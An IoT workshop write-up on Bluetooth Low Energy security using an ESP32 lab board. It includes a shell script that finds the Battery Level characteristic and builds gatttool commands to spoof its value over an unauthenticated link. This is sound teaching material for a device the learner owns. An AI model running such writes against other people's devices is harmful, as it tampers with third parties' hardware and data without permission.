BLE-NullBlr

IoT Workshop - BLE - Understanding and Exploiting

Resources

Download the tools


Rules for flashing the ESP32 board from the Arduino IDE:


Challenge 1: Identify the device information


Challenge 2: Understand the difference between Classic Bluetooth and BLE (Bluetooth Low Energy) security

[Basic practical approach: flash the general Bluetooth code into the ESP32](https://github.com/V33RU/BLE-NullBlr/blob/master/Bluetooth%20Connection%20-%20General)

Don't forget to change the Tools options in the IDE to match the board. Once flashed, power up the device and try to connect from a mobile device. Don't try to connect with the nRF Connect app: this code is for Classic Bluetooth, not BLE, so go to the Bluetooth settings on the mobile and pair from there.

This gives only a very basic picture of the difference in security between Classic and BLE. Classic Bluetooth also includes pairing and link-key authentication, while BLE adds its own pairing modes with link encryption, authentication and per-attribute permissions. This is not an exact comparison, just an idea; a complete comparison of Classic Bluetooth and Bluetooth Smart (BLE) with practical examples will be written later.

Challenge 3: Check the Services in BLE and check for Read/Write data

From the 1st challenge you will know how to get the BD_ADDR (the Bluetooth MAC address) of the device. Use the nRF Connect app, gatttool, or any other tool that shows the read and write handles; these handles are what the next level of testing works on.

Let's start by installing nRF Connect from the Play Store. It shows the read/write handles very easily, and it gives a lot of other information as well, as shown in the image.

Scan for surrounding Bluetooth devices to

Before starting the 3rd challenge we need to know a little more about BLE: please read the slides in the GitHub repo, or study GAP (advertising and connections) and GATT (services, characteristics and their handles).

Flash battery.ino (https://github.com/V33RU/BLE-NullBlr/blob/master/Ble-sec1.ino), open the nRF Connect app and look for the BLE Battery Service.

Standard services such as this one are defined by the Bluetooth SIG (Special Interest Group) and use 16-bit UUIDs; vendors can also define custom services with 128-bit UUIDs. Let's check the Battery GATT service.

Click on the code to see more details about it.

Once it is flashed, open nRF Connect and check what information is available.

The Battery Service has the SIG-assigned 16-bit UUID 0x180F; let's check its read and write data.

Connect to the device

Challenge 4: Try to overwrite or change the value of the service

Here we are going to use gatttool from the terminal. nRF Connect works as well, but gatttool from the terminal is more familiar to me. We now know how to read and write the data of the Battery Service; the final part is to change the value so that the mobile gets a wrong battery notification.

Let's connect first.

As we see in the nRF Connect app, the writable Battery Level characteristic is shown with UUID 0x2A19 next to its handle. To understand more about UUIDs, https://www.uuidgenerator.net/ will help.

Let's start: the handle is what you address a read or write at, and the Properties tell you whether it is READ or WRITE (or both).

A read request fails when you run it against a write-only handle (the device answers with a "read not permitted" error), and a write fails against a read-only one. This way we can confirm which handles are readable and which are writable even when nRF Connect gives us no information.

Now we can change the value, and the mobile will show a different battery level if you write a valid one (Battery Level is a single byte, 0 to 100 percent).
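The whole procedure of Challenges 3 and 4 from the terminal, as an added example that is not part of the workshop repository or its sketches: enumerate the characteristics, decode the properties byte to see which handle is READ and which is WRITE, and build the gatttool read and write commands for the Battery Level characteristic. The gatttool output below is constructed for the example (not captured from the ESP32), `AA:BB:CC:DD:EE:FF` is a placeholder for the BD_ADDR you found in Challenge 1, and the handle numbers are assumptions; on the real device take them from `gatttool -b <BD_ADDR> --characteristics`.

```shell
#!/bin/sh
# Added example for the BLE-NullBlr workshop (not the repository's own code).
# Assumed BD_ADDR; replace with the address found in Challenge 1.
ADDR="${ADDR:-AA:BB:CC:DD:EE:FF}"

# CONSTRUCTED sample of `gatttool -b $ADDR --characteristics` output. The last
# line is the Battery Level characteristic (SIG UUID 0x2A19) of the Battery
# Service (0x180F); handles 0x0028/0x0029 are assumed values.
CHARS='handle = 0x0002, char properties = 0x02, char value handle = 0x0003, uuid = 00002a00-0000-1000-8000-00805f9b34fb
handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01-0000-1000-8000-00805f9b34fb
handle = 0x0028, char properties = 0x1a, char value handle = 0x0029, uuid = 00002a19-0000-1000-8000-00805f9b34fb'

# Decode the "char properties" bitmask (Bluetooth Core spec, Vol 3 Part G, 3.3.1.1):
# 0x01 Broadcast, 0x02 Read, 0x04 Write Without Response, 0x08 Write,
# 0x10 Notify, 0x20 Indicate, 0x40 Authenticated Signed Write, 0x80 Extended.
decode_props() {
  p=$(( $1 ))
  out=""
  if [ $(( p & 0x01 )) -ne 0 ]; then out="$out BROADCAST"; fi
  if [ $(( p & 0x02 )) -ne 0 ]; then out="$out READ"; fi
  if [ $(( p & 0x04 )) -ne 0 ]; then out="$out WRITE_NO_RESP"; fi
  if [ $(( p & 0x08 )) -ne 0 ]; then out="$out WRITE"; fi
  if [ $(( p & 0x10 )) -ne 0 ]; then out="$out NOTIFY"; fi
  if [ $(( p & 0x20 )) -ne 0 ]; then out="$out INDICATE"; fi
  if [ $(( p & 0x40 )) -ne 0 ]; then out="$out AUTH_SIGNED_WRITE"; fi
  if [ $(( p & 0x80 )) -ne 0 ]; then out="$out EXTENDED"; fi
  printf '%s\n' "${out# }"
}

# Value handle of the characteristic with the given 16-bit SIG UUID (e.g. 2a19).
# The value handle, not the declaration handle, is what --char-read/-write address.
find_value_handle() {
  printf '%s\n' "$CHARS" | sed -n "s/.*char value handle = \(0x[0-9a-f]*\), uuid = 0000$1-.*/\1/p"
}

# Properties byte of the characteristic with the given 16-bit UUID.
find_props() {
  printf '%s\n' "$CHARS" | sed -n "s/.*char properties = \(0x[0-9a-f]*\),.*uuid = 0000$1-.*/\1/p"
}

# gatttool command that reads Battery Level by handle.
battery_read_cmd() {
  printf 'gatttool -b %s --char-read -a %s\n' "$1" "$(find_value_handle 2a19)"
}

# gatttool command that writes a fake percentage (0-100) to Battery Level.
# The value is one unsigned byte, so 100 is sent as 0x64.
battery_write_cmd() {
  printf 'gatttool -b %s --char-write-req -a %s -n %02x\n' "$1" "$(find_value_handle 2a19)" "$2"
}

# Stand-alone run: show what was found and the two commands to type.
h=$(find_value_handle 2a19)
echo "Battery Level value handle: $h, properties: $(decode_props "$(find_props 2a19)")"
echo "# read the current level:"
battery_read_cmd "$ADDR"
echo "# push a fake 100% reading to the phone:"
battery_write_cmd "$ADDR" 100
```

The write goes through because the sketch grants write permission on Battery Level without requiring an encrypted or authenticated link, so any client in range that knows the BD_ADDR can spoof the reading; a read on a write-only handle fails with ATT error 0x02 (Read Not Permitted), which is the failure used above to tell the handles apart. If the device advertises with a random address, add `-t random` to each gatttool command.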

This is just an example, not an exact write-up; this whole article is for educational purposes only.

Notes: